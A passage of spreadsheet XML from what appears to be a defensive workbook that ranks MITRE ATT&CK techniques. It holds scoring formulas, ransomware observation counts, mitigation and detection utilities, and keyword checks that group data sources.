        <v>1</v>
      </c>
      <c r="H420" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I420" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J420" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K420" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L420" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M420" s="37">
        <v>0</v>
      </c>
      <c r="N420" s="56">
        <v>0</v>
      </c>
      <c r="O420" s="56">
        <v>1</v>
      </c>
      <c r="P420" s="56">
        <v>0</v>
      </c>
      <c r="Q420" s="56">
        <v>4</v>
      </c>
      <c r="R420" s="57"/>
      <c r="S420" s="57"/>
      <c r="T420" s="57"/>
      <c r="U420" s="57"/>
      <c r="V420" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W420" s="37">
        <v>0</v>
      </c>
      <c r="X420" s="37">
        <v>0</v>
      </c>
      <c r="Y420" s="37">
        <v>0</v>
      </c>
      <c r="Z420" s="37">
        <v>5</v>
      </c>
      <c r="AA420" s="37">
        <v>0.05</v>
      </c>
      <c r="AB420" s="37">
        <v>0.05</v>
      </c>
      <c r="AC420" s="37"/>
      <c r="AD420" s="50" t="s">
        <v>1478</v>
      </c>
      <c r="AE420" s="37" t="str" cm="1">
        <f t="array" ref="AE420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD420)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF420" s="37">
        <v>416</v>
      </c>
      <c r="AG420" s="37" t="str" cm="1">
        <f t="array" ref="AG420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD420)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH420" s="37">
        <v>416</v>
      </c>
      <c r="AI420" s="37" t="str" cm="1">
        <f t="array" ref="AI420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD420)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ420" s="37">
        <v>416</v>
      </c>
      <c r="AK420" s="37" t="str" cm="1">
        <f t="array" ref="AK420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD420)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL420" s="37">
        <v>416</v>
      </c>
      <c r="AM420" s="37" t="str" cm="1">
        <f t="array" ref="AM420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD420)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN420" s="37">
        <v>0</v>
      </c>
      <c r="AO420" s="37"/>
      <c r="AP420" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ420" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.714285714285708</v>
      </c>
      <c r="AR420" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS420" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT420" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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21" spans="1:47" ht="68">
      <c r="A421" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B421" s="37">
        <f t="shared" si="6"/>
        <v>166.9</v>
      </c>
      <c r="C421" s="37" t="s">
        <v>3797</v>
      </c>
      <c r="D421" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E421" s="37" t="s">
        <v>3798</v>
      </c>
      <c r="F421" s="37">
        <v>1</v>
      </c>
      <c r="G421" s="37">
        <v>1</v>
      </c>
      <c r="H421" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I421" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J421" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K421" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L421" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M421" s="37">
        <v>0</v>
      </c>
      <c r="N421" s="56">
        <v>0</v>
      </c>
      <c r="O421" s="56">
        <v>0</v>
      </c>
      <c r="P421" s="56">
        <v>0</v>
      </c>
      <c r="Q421" s="56">
        <v>0</v>
      </c>
      <c r="R421" s="57"/>
      <c r="S421" s="57"/>
      <c r="T421" s="57"/>
      <c r="U421" s="57"/>
      <c r="V421" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W421" s="37"/>
      <c r="X421" s="37"/>
      <c r="Y421" s="37"/>
      <c r="Z421" s="37"/>
      <c r="AA421" s="37"/>
      <c r="AB421" s="37"/>
      <c r="AC421" s="37"/>
      <c r="AD421" s="50" t="s">
        <v>3799</v>
      </c>
      <c r="AE421" s="37" t="str" cm="1">
        <f t="array" ref="AE421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD421)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF421" s="37">
        <v>417</v>
      </c>
      <c r="AG421" s="37" t="str" cm="1">
        <f t="array" ref="AG421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD421)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH421" s="37">
        <v>417</v>
      </c>
      <c r="AI421" s="37" t="str" cm="1">
        <f t="array" ref="AI421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD421)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ421" s="37">
        <v>417</v>
      </c>
      <c r="AK421" s="37" t="str" cm="1">
        <f t="array" ref="AK421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD421)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL421" s="37">
        <v>417</v>
      </c>
      <c r="AM421" s="37" t="str" cm="1">
        <f t="array" ref="AM421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD421)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN421" s="37"/>
      <c r="AO421" s="37"/>
      <c r="AP421" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ421" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>55.633333333333333</v>
      </c>
      <c r="AR421" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS421" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT421" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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22" spans="1:47" ht="68">
      <c r="A422" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B422" s="37">
        <f t="shared" si="6"/>
        <v>1291.8937069999999</v>
      </c>
      <c r="C422" s="37" t="s">
        <v>1479</v>
      </c>
      <c r="D422" s="50" t="s">
        <v>1480</v>
      </c>
      <c r="E422" s="37"/>
      <c r="F422" s="37">
        <v>3</v>
      </c>
      <c r="G422" s="37">
        <v>3</v>
      </c>
      <c r="H422" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I422" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J422" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K422" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L422" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M422" s="37">
        <v>1.0297000000000001E-2</v>
      </c>
      <c r="N422" s="56">
        <v>0</v>
      </c>
      <c r="O422" s="56">
        <v>7</v>
      </c>
      <c r="P422" s="56">
        <v>0</v>
      </c>
      <c r="Q422" s="56">
        <v>0</v>
      </c>
      <c r="R422" s="57" t="s">
        <v>1481</v>
      </c>
      <c r="S422" s="57">
        <v>21</v>
      </c>
      <c r="T422" s="57" t="s">
        <v>1482</v>
      </c>
      <c r="U422" s="57">
        <v>24</v>
      </c>
      <c r="V422" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.46190485714285712</v>
      </c>
      <c r="W422" s="37">
        <v>45</v>
      </c>
      <c r="X422" s="37">
        <v>0.81818199999999996</v>
      </c>
      <c r="Y422" s="37">
        <v>0.81818199999999996</v>
      </c>
      <c r="Z422" s="37">
        <v>7</v>
      </c>
      <c r="AA422" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB422" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC422" s="37"/>
      <c r="AD422" s="50" t="s">
        <v>1483</v>
      </c>
      <c r="AE422" s="37" t="str" cm="1">
        <f t="array" ref="AE422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD422)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF422" s="37">
        <v>418</v>
      </c>
      <c r="AG422" s="37" t="str" cm="1">
        <f t="array" ref="AG422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD422)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH422" s="37">
        <v>418</v>
      </c>
      <c r="AI422" s="37" t="str" cm="1">
        <f t="array" ref="AI422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD422)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ422" s="37">
        <v>418</v>
      </c>
      <c r="AK422" s="37" t="str" cm="1">
        <f t="array" ref="AK422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL422" s="37">
        <v>418</v>
      </c>
      <c r="AM422" s="37" t="str" cm="1">
        <f t="array" ref="AM422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN422" s="37">
        <v>0</v>
      </c>
      <c r="AO422" s="37">
        <v>1</v>
      </c>
      <c r="AP422" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ422" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>430.63123566666667</v>
      </c>
      <c r="AR422" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS422" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT422" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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10.276934182539682</v>
      </c>
    </row>
    <row r="423" spans="1:47" ht="68">
      <c r="A423" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B423" s="37">
        <f t="shared" si="6"/>
        <v>686.77110914285731</v>
      </c>
      <c r="C423" s="37" t="s">
        <v>1484</v>
      </c>
      <c r="D423" s="50" t="s">
        <v>1480</v>
      </c>
      <c r="E423" s="37" t="s">
        <v>1485</v>
      </c>
      <c r="F423" s="37">
        <v>1</v>
      </c>
      <c r="G423" s="37">
        <v>1</v>
      </c>
      <c r="H423" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I423" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J423" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K423" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L423" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M423" s="37">
        <v>0</v>
      </c>
      <c r="N423" s="56">
        <v>0</v>
      </c>
      <c r="O423" s="56">
        <v>0</v>
      </c>
      <c r="P423" s="56">
        <v>0</v>
      </c>
      <c r="Q423" s="56">
        <v>3</v>
      </c>
      <c r="R423" s="57" t="s">
        <v>1486</v>
      </c>
      <c r="S423" s="57">
        <v>16</v>
      </c>
      <c r="T423" s="57" t="s">
        <v>1487</v>
      </c>
      <c r="U423" s="57">
        <v>15</v>
      </c>
      <c r="V423" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3095236190476191</v>
      </c>
      <c r="W423" s="37">
        <v>31</v>
      </c>
      <c r="X423" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y423" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z423" s="37">
        <v>3</v>
      </c>
      <c r="AA423" s="37">
        <v>0.03</v>
      </c>
      <c r="AB423" s="37">
        <v>0.03</v>
      </c>
      <c r="AC423" s="37"/>
      <c r="AD423" s="50" t="s">
        <v>1488</v>
      </c>
      <c r="AE423" s="37" t="str" cm="1">
        <f t="array" ref="AE423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD423)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF423" s="37">
        <v>419</v>
      </c>
      <c r="AG423" s="37" t="str" cm="1">
        <f t="array" ref="AG423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD423)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH423" s="37">
        <v>419</v>
      </c>
      <c r="AI423" s="37" t="str" cm="1">
        <f t="array" ref="AI423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD423)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ423" s="37">
        <v>419</v>
      </c>
      <c r="AK423" s="37" t="str" cm="1">
        <f t="array" ref="AK423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD423)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL423" s="37">
        <v>419</v>
      </c>
      <c r="AM423" s="37" t="str" cm="1">
        <f t="array" ref="AM423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD423)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN423" s="37">
        <v>0</v>
      </c>
      <c r="AO423" s="37">
        <v>1</v>
      </c>
      <c r="AP423" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ423" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>228.92370304761911</v>
      </c>
      <c r="AR423" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS423" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT423" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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5.4743738820861685</v>
      </c>
    </row>
    <row r="424" spans="1:47" ht="34">
      <c r="A424" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B424" s="37">
        <f t="shared" si="6"/>
        <v>760.45214080952383</v>
      </c>
      <c r="C424" s="37" t="s">
        <v>1489</v>
      </c>
      <c r="D424" s="50" t="s">
        <v>1480</v>
      </c>
      <c r="E424" s="37" t="s">
        <v>1490</v>
      </c>
      <c r="F424" s="37">
        <v>1</v>
      </c>
      <c r="G424" s="37">
        <v>1</v>
      </c>
      <c r="H424" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I424" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J424" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K424" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L424" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M424" s="37">
        <v>0</v>
      </c>
      <c r="N424" s="56">
        <v>0</v>
      </c>
      <c r="O424" s="56">
        <v>0</v>
      </c>
      <c r="P424" s="56">
        <v>0</v>
      </c>
      <c r="Q424" s="56">
        <v>0</v>
      </c>
      <c r="R424" s="57" t="s">
        <v>1491</v>
      </c>
      <c r="S424" s="57">
        <v>15</v>
      </c>
      <c r="T424" s="57" t="s">
        <v>1492</v>
      </c>
      <c r="U424" s="57">
        <v>22</v>
      </c>
      <c r="V424" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.35238080952380951</v>
      </c>
      <c r="W424" s="37">
        <v>37</v>
      </c>
      <c r="X424" s="37">
        <v>0.67272699999999996</v>
      </c>
      <c r="Y424" s="37">
        <v>0.67272699999999996</v>
      </c>
      <c r="Z424" s="37">
        <v>0</v>
      </c>
      <c r="AA424" s="37">
        <v>0</v>
      </c>
      <c r="AB424" s="37">
        <v>0</v>
      </c>
      <c r="AC424" s="37"/>
      <c r="AD424" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE424" s="37" t="str" cm="1">
        <f t="array" ref="AE424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF424" s="37">
        <v>420</v>
      </c>
      <c r="AG424" s="37" t="str" cm="1">
        <f t="array" ref="AG424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD424)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH424" s="37">
        <v>420</v>
      </c>
      <c r="AI424" s="37" t="str" cm="1">
        <f t="array" ref="AI424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ424" s="37">
        <v>420</v>
      </c>
      <c r="AK424" s="37" t="str" cm="1">
        <f t="array" ref="AK424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL424" s="37">
        <v>420</v>
      </c>
      <c r="AM424" s="37" t="str" cm="1">
        <f t="array" ref="AM424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN424" s="37">
        <v>0</v>
      </c>
      <c r="AO424" s="37">
        <v>1</v>
      </c>
      <c r="AP424" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ424" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>253.48404693650795</v>
      </c>
      <c r="AR424" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS424" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT424" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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6.0591439746787596</v>
      </c>
    </row>
    <row r="425" spans="1:47" ht="51">
      <c r="A425" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B425" s="37">
        <f t="shared" si="6"/>
        <v>2094.2142857142858</v>
      </c>
      <c r="C425" s="37" t="s">
        <v>1493</v>
      </c>
      <c r="D425" s="50" t="s">
        <v>1480</v>
      </c>
      <c r="E425" s="37" t="s">
        <v>1494</v>
      </c>
      <c r="F425" s="37">
        <v>1</v>
      </c>
      <c r="G425" s="37">
        <v>1</v>
      </c>
      <c r="H425" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I425" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J425" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K425" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L425" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M425" s="37">
        <v>1</v>
      </c>
      <c r="N425" s="56">
        <v>0</v>
      </c>
      <c r="O425" s="56">
        <v>3</v>
      </c>
      <c r="P425" s="56">
        <v>9</v>
      </c>
      <c r="Q425" s="56">
        <v>18</v>
      </c>
      <c r="R425" s="57"/>
      <c r="S425" s="57"/>
      <c r="T425" s="57"/>
